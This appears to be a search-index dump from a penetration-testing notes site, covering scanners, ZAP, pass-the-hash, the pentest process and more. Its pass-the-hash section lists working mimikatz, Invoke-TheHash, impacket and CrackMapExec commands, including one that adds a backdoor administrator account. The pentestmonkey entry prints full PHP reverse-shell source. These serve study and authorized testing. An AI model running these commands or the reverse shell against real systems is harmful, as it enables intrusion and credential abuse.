    python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx\n
    ","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"operating-systems/","title":"Repo for legacy Operating system","text":"","tags":["resources"]},{"location":"operating-systems/#old-version-of-windows","title":"Old version of Windows","text":"

    From Windows 1.0 DR 5 to nowadays ISOs: https://osvault.weebly.com/windows-beta-repository.html

    ","tags":["resources"]},{"location":"operating-systems/#windows-servers","title":"Windows servers","text":"","tags":["resources"]},{"location":"operating-systems/#-windows-server-2019-httpswwwmicrosoftcomes-esevalcenterdownload-windows-server-2019","title":"- Windows Server 2019: https://www.microsoft.com/es-es/evalcenter/download-windows-server-2019.","text":"","tags":["resources"]},{"location":"ophcrack/","title":"ophcrack - A windows password cracker based on rainbow tables","text":"

    Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

    ","tags":["pentesting","password cracker"]},{"location":"ophcrack/#installation","title":"Installation","text":"

    Download from https://ophcrack.sourceforge.io/.

    ","tags":["pentesting","password cracker"]},{"location":"owasp-zap/","title":"OWASP zap","text":"

    To launch it, run:

    zaproxy\n

    You can do several things:

    • Run an automatic attack.
    • Import your spec.yml file and run an automatic attack.
    • Run a manual attack.

    The manual explore option will allow you to perform authenticated scanning. Set the URL to your target, make sure the HUD is enabled, and choose \"Launch Browser\".

    "},{"location":"owasp-zap/#how-to-run-a-manual-attack","title":"How to run a manual attack","text":"

    Select \"Continue to your target\". On the right-hand side of the HUD, you can set the Attack Mode to On. This will begin scanning and performing authenticated testing of the target. Now you perform all the actions (sign up a new user, log in into the account, modify you avatar, post a comment...).

    After that, OWASP ZAP allows you to narrow the results to your target. How? In the Sites module, right-click on your site and select \"Include in context\". After that, click on the \"target\"-shaped icon to filter sites by context.

    With the results, start your analysis and weed out false positives.

    "},{"location":"owasp-zap/#interesting-addons","title":"Interesting addons","text":"

    Update all your addons when opening ZAP for the first time.

    • Treetools
    • Reflect
    • Revisit
    • Directory List v.2.3
    • Wappalyzer
    • Python Scripting
    • Passive scanner rules
    • FileUpload
    • Regular Expression tester.
    "},{"location":"p0f/","title":"P0f","text":"

    P0f is a tool that utilizes an array of sophisticated, purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications (often as little as a single normal SYN) without interfering in any way. Version 3 is a complete rewrite of the original codebase, incorporating a significant number of improvements to network-level fingerprinting, and introducing the ability to reason about application-level payloads (e.g., HTTP).

    ","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"p0f/#installation","title":"Installation","text":"

    Download from: https://lcamtuf.coredump.cx/p0f3/.

    ","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"p0f/#_1","title":"p0f","text":"","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"pass-the-hash/","title":"Pass The Hash","text":"

    With NTLM, passwords stored on the server and domain controller are not \"salted,\" which means that an adversary with a password hash can authenticate a session without knowing the original password. A Pass the Hash (PtH) attack is a technique where an attacker uses a password hash instead of the plain text password for authentication.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-mimikatz-windows","title":"Pass the Hash with Mimikatz (Windows)","text":"

    see mimikatz

    # Pass The Hash attack in windows:\n# 1. Run mimikatz\nmimikatz.exe privilege::debug \"sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>\" exit\n# sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password\n# /run:<Command>: For example /run:cmd.exe\n# 2. After that, we can use cmd.exe to execute commands in the user's context. \n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-powershell-invoke-thehash-windows","title":"Pass the Hash with PowerShell Invoke-TheHash (Windows)","text":"

    See Powershell Invoke-TheHash. This tool is a collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

    When using Invoke-TheHash, we have two options: SMB or WMI command execution.

    cd C:\\tools\\Invoke-TheHash\\\n\nImport-Module .\\Invoke-TheHash.psd1\n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#invoke-thehash-with-smb","title":"Invoke-TheHash with SMB","text":"
    Invoke-SMBExec -Target $ip -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command \"net user mark Password123 /add && net localgroup administrators mark /add\" -Verbose\n# Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.\n# we can execute `Invoke-TheHash` to execute our PowerShell reverse shell script in the target computer.\n

    How to generate a reverse shell.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#invoke-thehash-with-wmi","title":"Invoke-TheHash with WMI","text":"
    Invoke-WMIExec -Target $machineName -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command  \"net user mark Password123 /add && net localgroup administrators mark /add\" \n

    How to generate a reverse shell.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-linux","title":"Pass the Hash with Impacket (Linux)","text":"","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-psexec","title":"Pass the Hash with Impacket PsExec","text":"
    impacket-psexec <username>@$ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453\n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-wmiexec","title":"Pass the Hash with impacket-wmiexec","text":"

    Download from: https://github.com/fortra/impacket/blob/master/examples/wmiexec.py.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-atexec","title":"Pass the Hash with impacket-atexec","text":"

    Download from: https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-smbexec","title":"Pass the Hash with impacket-smbexec","text":"

    Download from: https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-crackmapexec-linux","title":"Pass the Hash with CrackMapExec (Linux)","text":"

    See CrackMapExec

    # Using a hash instead of a password, to authenticate ourselves\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-evil-winrm-linux","title":"Pass the Hash with evil-winrm (Linux)","text":"

    See evil-winrm.

    If SMB is blocked or we don't have administrative rights, we can use this alternative protocol to connect to the target machine.

    evil-winrm -i $ip -u <username> -H <hash>\n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-rdp-linux","title":"Pass the Hash with RDP (Linux)","text":"
    xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip\n# /pth:<hash>   Pass the hash\n

    Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa with the value of 0. It can be done using the following command:

    reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n

    Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#uac-limits-pass-the-hash-for-local-accounts","title":"UAC Limits Pass the Hash for Local Accounts","text":"

    UAC (User Account Control) limits local users' ability to perform remote administration operations. When the registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy is set to 0, it means that the built-in local admin account (RID-500, \"Administrator\") is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.
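    The key can be set with the same reg add approach used earlier for DisableRestrictedAdmin (a sketch, to be run from an elevated prompt):

    reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1 /f\n# 1 -> all local administrators can perform remote administration tasks (remote PtH works for them)\n# 0 -> only the built-in RID-500 Administrator account can\n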

    Note: There is one exception: if the registry key FilterAdministratorToken (disabled by default) is enabled (value 1), the RID-500 account (even if it is renamed) is enrolled in UAC protection. This means that remote PtH will fail against the machine when using that account.

    ","tags":["privilege escalation","windows"]},{"location":"pdm/","title":"pdm - A python package and dependency manager","text":""},{"location":"pdm/#installation","title":"Installation","text":"

    PDM, as described, is a modern Python package and dependency manager supporting the latest PEP standards. But it is more than a package manager: it boosts your development workflow in various ways. The most significant benefit is that it installs and manages packages similarly to npm, without needing to create a virtualenv at all.

    curl -sSL https://raw.githubusercontent.com/pdm-project/pdm/main/install-pdm.py | python3 -\n
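    A typical workflow after installation looks roughly like this (a minimal sketch; main.py is a placeholder for your own script):

    # Initialize a project (creates pyproject.toml)\npdm init\n\n# Add a dependency\npdm add requests\n\n# Run a command inside the managed environment\npdm run python main.py\n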
    "},{"location":"penetration-testing-process/","title":"Penetration Testing Process: A General Approach to the Profession","text":"Sources for these notes
    • Hack The Box: Penetration Testing Learning Path
    • INE eWPT2 Preparation course

    Resources:

    • https://pentestreports.com/
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#types-of-penetration-testing","title":"Types of Penetration Testing","text":"Type Information Provided BlackboxMinimal. Only the essential information, such as IP addresses and domains, is provided. GreyboxExtended. In this case, we are provided with additional information, such as specific URLs, hostnames, subnets, and similar. WhiteboxMaximum. Here everything is disclosed to us. This gives us an internal view of the entire structure, which allows us to prepare an attack using internal information. We may be given detailed configurations, admin credentials, web application source code, etc. Red-Teaming May include physical testing and social engineering, among other things. Can be combined with any of the above types. Purple-Teaming It can be combined with any of the above types. However, it focuses on working closely with the defenders.","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#types-of-testing-environments","title":"Types of Testing Environments","text":"

    Apart from the test method and the type of test, another consideration is what is to be tested, which can be summarized in the following categories:

    Network, Web App, Mobile, API, Thick Clients, IoT, Cloud, Source Code, Physical Security, Employees, Hosts, Server, Security Policies, Firewalls, IDS/IPS.","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#phases","title":"Phases","text":"","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#pre-engagement","title":"Pre-engagement","text":"

    The pre-engagement phase of a penetration test is a crucial step that lays the foundation for a successful and well-planned security assessment. It involves preliminary preparations, understanding project requirements, and obtaining the necessary authorizations before initiating the actual testing. During this phase, the penetration tester and the client must discuss and agree upon a number of legal and technical details pertinent to the execution and outcomes of the security assessment.

    This can be one or more documents with the objective to define the following:

    • Objectives: Clearly define the objectives and goals of the penetration test. Understand what the stakeholders aim to achieve through the testing process.
    • Scope of the engagement: Identify the scope of the penetration test, including the specific web applications, URLs, and functionalities to be tested. Define the scope boundaries and limitations, such as which systems or networks are out-of-scope for testing.
    • Timeline & milestones
    • Liabilities & responsibility: Obtain proper authorization from the organization's management or application owners to conduct the penetration test. Ensure that the testing activities comply with any legal or regulatory requirements, and that all relevant permissions are secured.
    • Rules of Engagement (RoE): Establish a set of Rules of Engagement that outline the specific rules, constraints, and guidelines for the testing process. Include details about the testing schedule, testing hours, communication channels, and escalation procedures.
    • Communication and Coordination: Establish clear communication channels with key stakeholders, including IT personnel, development teams, and management. Coordinate with relevant personnel to ensure minimal disruption to the production environment during testing.
    • Expectations and deliverables
    • Statement of work
    • The Scoping Meeting: Conduct a scoping meeting with key stakeholders to discuss the testing objectives, scope, and any specific concerns or constraints. Use this meeting to clarify expectations and ensure everyone is aligned with the testing approach.
    • List of documents so far:
      • Non-Disclosure Agreement (NDA): After Initial Contact
      • Scoping Questionnaire: Before the Pre-Engagement Meeting
      • Scoping Document: During the Pre-Engagement Meeting
      • Penetration Testing Proposal (Contract/Scope of Work (SoW)): During the Pre-Engagement Meeting
      • Rules of Engagement (RoE): Before the Kick-Off Meeting
      • Contractors Agreement (Physical Assessments): Before the Kick-Off Meeting
      • Reports: During and after the conducted Penetration Test
    • Risk Assessment and Acceptance: Perform a risk assessment to understand the potential impact of the penetration test on the web application and the organization. Obtain management's acceptance of any risks associated with the testing process.
    • Engagement Kick-off: Officially kick-off the penetration test, confirming the start date and timeline with the organization's stakeholders. Share the RoE and any other relevant details with the testing team.
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#information-gathering","title":"Information gathering","text":"

    We could tell 4 categories:

    • Open-Source Intelligence
    • Infrastructure Enumeration
    • Service Enumeration
    • Host Enumeration

    A different way to approach to footprinting is considering the following layers:

    1. Internet Presence: Identification of internet presence and externally accessible infrastructure. Information categories: Domains, Subdomains, vHosts, ASN, Netblocks, IP Addresses, Cloud Instances, Security Measures.
    2. Gateway: Identify the possible security measures to protect the company's external and internal infrastructure. Information categories: Firewalls, DMZ, IPS/IDS, EDR, Proxies, NAC, Network Segmentation, VPN, Cloudflare.
    3. Accessible Services: Identify accessible interfaces and services that are hosted externally or internally. Information categories: Service Type, Functionality, Configuration, Port, Version, Interface.
    4. Processes: Identify the internal processes, sources, and destinations associated with the services. Information categories: PID, Processed Data, Tasks, Source, Destination.
    5. Privileges: Identification of the internal permissions and privileges to the accessible services. Information categories: Groups, Users, Permissions, Restrictions, Environment.
    6. OS Setup: Identification of the internal components and systems setup. Information categories: OS Type, Patch Level, Network config, OS Environment, Configuration files, sensitive private files.
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#cloud-resources","title":"Cloud resources","text":"

    Often cloud storage is added to the DNS list when used for administrative purposes by other employees.

    for i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f1,4;done\n

    More ways to find cloud storage:

    google dork:

    # Google search for AWS\nintext:example.com inurl:amazonaws.com\n\n# Google search for Azure\nintext:example.com inurl:blob.core.windows.net\n

    Source code of the application. For instance:

    <link rel='dns-prefetch' href=\"//example.blob.core.windows.net\">\n

    The domain.glass service also provides cloud search capabilities for passive reconnaissance.

    GrayHatWarfare is also worth noting. With this tool you can search exposed buckets and filter for leaked private and public keys.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#vulnerability-assessment","title":"Vulnerability assessment","text":"

    During the vulnerability assessment phase, we examine and analyze the information gathered during the information gathering phase. In Vulnerability Research, we look for known vulnerabilities, exploits, and security holes that have already been discovered and reported. After that, we should mirror the target system locally as precisely as possible to replicate our testing locally.

    The purpose of a Vulnerability Assessment is to understand, identify, and categorize the risk for the more apparent issues present in an environment without actually exploiting them to gain further access.

    Types of tests: black box, gray box and white box.

    Specializations:

    • Application pentesters.
    • Network or infrastructure pentesters.
    • Physical pentesters.
    • Social engineering pentesters.

    Types of Security assessments:

    • Vulnerability assessment.
    • Penetration test.
    • Security audits.
    • Bug bounties.
    • Red team assessments.
    • Purple team assessments.

    Vulnerability Assessments and Penetration Tests are two completely different assessments. Vulnerability assessments look for vulnerabilities in networks without simulating cyber attacks. Penetration tests, depending on their type, evaluate the security of different assets and the impact of the issues present in the environment.

    Source: HTB Academy and predatech.co.uk

    Compliance standards

    • Payment Card Industry Data Security Standard (PCI DSS).
    • Health Insurance Portability and Accountability Act (HIPAA).
    • Federal Information Security Management Act (FISMA).
    • ISO 27001.
    • The NIST (National Institute of Standards and Technology) is well known for their NIST Cybersecurity Framework.
    • OWASP stands for the Open Web Application Security Project:
      • Web Security Testing Guide (WSTG)
      • Mobile Security Testing Guide (MSTG)
      • Firmware Security Testing Methodology

    Frameworks for Pentesting:

    • Penetration Testing Execution Standard (PTES).
    • Open Source Security Testing Methodology Manual (OSSTMM).
    • Common Vulnerability Scoring System (CVSS).
    • Common Vulnerabilities and Exposures (CVE).

    Scanners: OpenVAS, Nessus, Nexpose, and Qualys.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#exploitation","title":"Exploitation","text":"

    Once we have set up the system locally and installed known components to mirror the target environment as closely as possible, we can start preparing the exploit by following the steps described in it. Then we test the exploit on a locally hosted VM to ensure it works and does not cause significant damage.

    • Transferring File Techniques: Linux.
    • Transferring File Techniques: Windows
    • Transferring files with code.
    • File Encryption: windows and linux .
    • LOLbins - \"Living off the land\" binaries: LOLbas and GTFObins.
    • Evading detection in file transfers.
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#post-exploitation","title":"Post-exploitation","text":"

    The Post-Exploitation stage aims to obtain sensitive and security-relevant information from a local perspective and business-relevant information that, in most cases, requires higher privileges than a standard user. This stage includes the following components:

    • Evasive Testing: watch out when running commands such as net user or whoami, which are often monitored by EDR systems and flagged as anomalous activity. Three methods: Evasive, Hybrid evasive, and Non-evasive.
    • Information Gathering. The information gathering stage starts all over again from the local perspective. We also enumerate the local network and local services such as printers, database servers, virtualization services, etc.
    • Pillaging. Pillaging is the stage where we examine the role of the host in the corporate network. We analyze the network configurations, including but not limited to: Interfaces, Routing, DNS, ARP, Services, VPN, IP Subnets, Shares, Network Traffic.
    • Vulnerability Assessment: it is essential to distinguish between exploits that can harm the system and attacks against the services that do not cause any disruption.
    • Privilege Escalation
    • Persistence
    • Data Exfiltration: During the Information Gathering and Pillaging stage, we will often be able to find, among other things, considerable personal information and customer data. Some clients will want to check whether it is possible to exfiltrate these types of data. This means we try to transfer this information from the target system to our own.
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#lateral-movement","title":"Lateral movement","text":"

    In this stage, we want to test how far we can move manually in the entire network and what vulnerabilities we can find from the internal perspective that might be exploited. In doing so, we will again run through several phases:

    1. Pivoting
    2. Evasive Testing: There are many ways to protect against lateral movement, including network (micro) segmentation, threat monitoring, IPS/IDS, EDR, etc. To bypass these efficiently, we need to understand how they work and what they respond to. Then we can adapt and apply methods and strategies that help avoid detection.
    3. Information Gathering
    4. Vulnerability Assessment
    5. (Privilege) Exploitation
    6. Post-Exploitation
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#proof-of-concept","title":"Proof-Of-Concept","text":"

    Proof of Concept (PoC) or Proof of Principle is a project management term. In project management, it serves as proof that a project is feasible in principle.

    A PoC can have many different representations. For example, documentation of the vulnerabilities found can also constitute a PoC. The more practical version of a PoC is a script or code that automatically exploits the vulnerabilities found. This demonstrates the flawless exploitation of the vulnerabilities. This variant is straightforward for an administrator or developer because they can see what steps our script takes to exploit the vulnerability.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#post-engagement","title":"Post-Engagement","text":"","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#cleanup","title":"Cleanup","text":"

    Cleanup: Once testing is complete, we should perform any necessary cleanup, such as deleting tools/scripts uploaded to target systems, reverting any (minor) configuration changes we may have made, etc. We should have detailed notes of all of our activities, making any cleanup activities easy and efficient.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#reporting","title":"Reporting","text":"

    Documentation and Reporting: Before completing the assessment and disconnecting from the client's internal network or sending \"stop\" notification emails to signal the end of testing, we must make sure to have adequate documentation for all findings that we plan to include in our report. This includes command output, screenshots, a listing of affected hosts, and anything else specific to the client environment or finding.

    Typical parts of a report:

    • Executive Summary: The report typically begins with an executive summary, which is a high-level overview of the key findings and the overall security posture of the web application. It highlights the most critical vulnerabilities, potential risks, and the impact they may have on the business. This section is designed for management and non-technical stakeholders to provide a quick understanding of the test results.
    • Scope and Methodology: This section provides a clear description of the scope of the penetration test, including the target application, its components, and the specific testing activities performed. It also outlines the methodologies and techniques used during the assessment to ensure transparency and understanding of the testing process.
    • Findings and Vulnerabilities: The core of the penetration test report is the detailed findings section. Each identified vulnerability is listed, along with a comprehensive description of the issue, the steps to reproduce it, and its potential impact on the application and organization. The vulnerabilities are categorized based on their severity level (e.g., critical, high, medium, low) to prioritize remediation efforts.
    • Proof of Concept (PoC): For each identified vulnerability, the penetration tester includes a proof of concept (PoC) to demonstrate its exploitability. The PoC provides concrete evidence to support the validity of the findings and helps developers understand the exact steps required to reproduce the vulnerability.
    • Risk Rating and Recommendations: In this section, the vulnerabilities are further analyzed to determine their risk rating and potential impact on the organization. The risk rating takes into account factors such as likelihood of exploitation, ease of exploit, potential data exposure, and business impact. Additionally, specific recommendations and best practices are provided to address and mitigate each vulnerability.
    • Remediation Plan: The report should include a detailed remediation plan outlining the steps and actions required to fix the identified vulnerabilities. This plan helps guide the development and IT teams in prioritizing and addressing the security issues in a systematic manner.
    • Additional Recommendations: In some cases, the report may include broader recommendations for improving the overall security posture of the web application beyond the identified vulnerabilities. These may include implementing security best practices, enhancing security controls, and conducting regular security awareness training.
    • Appendices and Technical Details: Supporting technical details, such as HTTP requests and responses, server configurations, and logs, may be included in appendices to provide additional context and evidence for the identified vulnerabilities.

    Resources:

    • https://pentestreports.com/
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#report-review-meeting","title":"Report Review Meeting","text":"

    Report Review Meeting: Once the draft report is delivered, and the client has had a chance to distribute it internally and review it in-depth, it is customary to hold a report review meeting to walk through the assessment results.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#deliverable-acceptance","title":"Deliverable Acceptance","text":"

    Deliverable Acceptance: Once the client has submitted feedback (i.e., management responses, requests for clarification/changes, additional evidence, etc.) either by email or (ideally) during a report review meeting, we can issue them a new version of the report marked FINAL.

    Post-Remediation Testing: Most engagements include post-remediation testing as part of the project's total cost. In this phase, we will review any documentation provided by the client showing evidence of remediation or just a list of remediated findings.

    Since a penetration test is essentially an audit, we must remain impartial third parties and not perform remediation on our findings (such as fixing code, patching systems, or making configuration changes in Active Directory). After a penetration test concludes, we will have a considerable amount of client-specific data such as scan results, log output, credentials, screenshots, and more. We should retain evidence for some time after the penetration test in case questions arise about specific findings or to assist with retesting \"closed\" findings after the client has performed remediation activities. Any data retained after the assessment should be stored in a secure location owned and controlled by the firm and encrypted at rest.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"pentesmonkey/","title":"Pentesmonkey php reverse shell","text":"Resources to generate reverse shells
    • https://www.revshells.com/
    • Netcat for windows 32/64 bit
    • Pentesmonkey
    • PayloadsAllTheThings

    Additionally, have a look at \"notes on reverse shells\"

    Download Pentesmonkey from github: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php.

    <?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n//\n// This tool may be used for legal purposes only.  Users take full responsibility\n// for any actions performed using this tool.  The author accepts no liability\n// for damage caused by this tool.  If these terms are not acceptable to you, then\n// do not use this tool.\n//\n// In all other respects the GPL version 2 applies:\n//\n// This program is free software; you can redistribute it and/or modify\n// it under the terms of the GNU General Public License version 2 as\n// published by the Free Software Foundation.\n//\n// This program is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License along\n// with this program; if not, write to the Free Software Foundation, Inc.,\n// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n//\n// This tool may be used for legal purposes only.  Users take full responsibility\n// for any actions performed using this tool.  If these terms are not acceptable to\n// you, then do not use this tool.\n//\n// You are encouraged to send comments, improvements or suggestions to\n// me at pentestmonkey@pentestmonkey.net\n//\n// Description\n// -----------\n// This script will make an outbound TCP connection to a hardcoded IP and port.\n// The recipient will be given a shell running as the current user (apache normally).\n//\n// Limitations\n// -----------\n// proc_open and stream_set_blocking require PHP version 4.3+, or 5+\n// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\n// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.\n//\n// Usage\n// -----\n// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '127.0.0.1';  // CHANGE THIS\n$port = 1234;       // CHANGE THIS\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; /bin/sh -i';\n$daemon = 0;\n$debug = 0;\n\n//\n// Daemonise ourself if possible to avoid zombies later\n//\n\n// pcntl_fork is hardly ever available, but will allow us to daemonise\n// our php process and avoid zombies.  Worth a try...\nif (function_exists('pcntl_fork')) {\n    // Fork and have the parent process exit\n    $pid = pcntl_fork();\n\n    if ($pid == -1) {\n        printit(\"ERROR: Can't fork\");\n        exit(1);\n    }\n\n    if ($pid) {\n        exit(0);  // Parent exits\n    }\n\n    // Make the current process a session leader\n    // Will only succeed if we forked\n    if (posix_setsid() == -1) {\n        printit(\"Error: Can't setsid()\");\n        exit(1);\n    }\n\n    $daemon = 1;\n} else {\n    printit(\"WARNING: Failed to daemonise.  
This is quite common and not fatal.\");\n}\n\n// Change to a safe directory\nchdir(\"/\");\n\n// Remove any umask we inherited\numask(0);\n\n//\n// Do the reverse shell...\n//\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n    printit(\"$errstr ($errno)\");\n    exit(1);\n}\n\n// Spawn shell process\n$descriptorspec = array(\n   0 => array(\"pipe\", \"r\"),  // stdin is a pipe that the child will read from\n   1 => array(\"pipe\", \"w\"),  // stdout is a pipe that the child will write to\n   2 => array(\"pipe\", \"w\")   // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n    printit(\"ERROR: Can't spawn shell\");\n    exit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n    // Check for end of TCP connection\n    if (feof($sock)) {\n        printit(\"ERROR: Shell connection terminated\");\n        break;\n    }\n\n    // Check for end of STDOUT\n    if (feof($pipes[1])) {\n        printit(\"ERROR: Shell process terminated\");\n        break;\n    }\n\n    // Wait until a command is end down $sock, or some\n    // command output is available on STDOUT or STDERR\n    $read_a = array($sock, $pipes[1], $pipes[2]);\n    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n    // If we can read from the TCP socket, send\n    // data to process's STDIN\n    if (in_array($sock, $read_a)) {\n        if ($debug) printit(\"SOCK READ\");\n        $input = fread($sock, $chunk_size);\n        if ($debug) printit(\"SOCK: $input\");\n        fwrite($pipes[0], $input);\n    }\n\n    // If we can read from the process's STDOUT\n    // send data down tcp connection\n    if (in_array($pipes[1], $read_a)) {\n        if ($debug) printit(\"STDOUT READ\");\n        $input = fread($pipes[1], $chunk_size);\n        if ($debug) printit(\"STDOUT: $input\");\n        fwrite($sock, $input);\n    }\n\n    // If we can read from the process's STDERR\n    // send data down tcp connection\n    if (in_array($pipes[2], $read_a)) {\n        if ($debug) printit(\"STDERR READ\");\n        $input = fread($pipes[2], $chunk_size);\n        if ($debug) printit(\"STDERR: $input\");\n        fwrite($sock, $input);\n    }\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\n// Like print, but does nothing if we've daemonised ourself\n// (I can't figure out how to redirect STDOUT like a proper daemon)\nfunction printit ($string) {\n    if (!$daemon) {\n        print \"$string\\n\";\n    }\n}\n\n?> \n
    ","tags":["reverse shell","php"]},{"location":"pentesting-network-services/","title":"Pentesting network services","text":"

    Port numbers range from 1 to 65,535, with the range of well-known ports 1 to 1,023 being reserved for privileged services. Port 0 is a reserved port in TCP/IP networking and is not used in TCP or UDP messages. If anything attempts to bind to port 0 (such as a service), it will bind to the next available port above port 1,024 because port 0 is treated as a \"wild card\" port.

    See Pentesting network services.

    To easily locate a port: https://www.cheatsheet.wtf/PortNumbers/

    All ports in raw: https://raw.githubusercontent.com/maraisr/ports-list/master/all.csv.
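    The raw CSV also lends itself to quick local lookups (a sketch; the exact column layout of that CSV is an assumption here, grep simply matches anywhere in the line):

    curl -s https://raw.githubusercontent.com/maraisr/ports-list/master/all.csv | grep -i ldap\n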

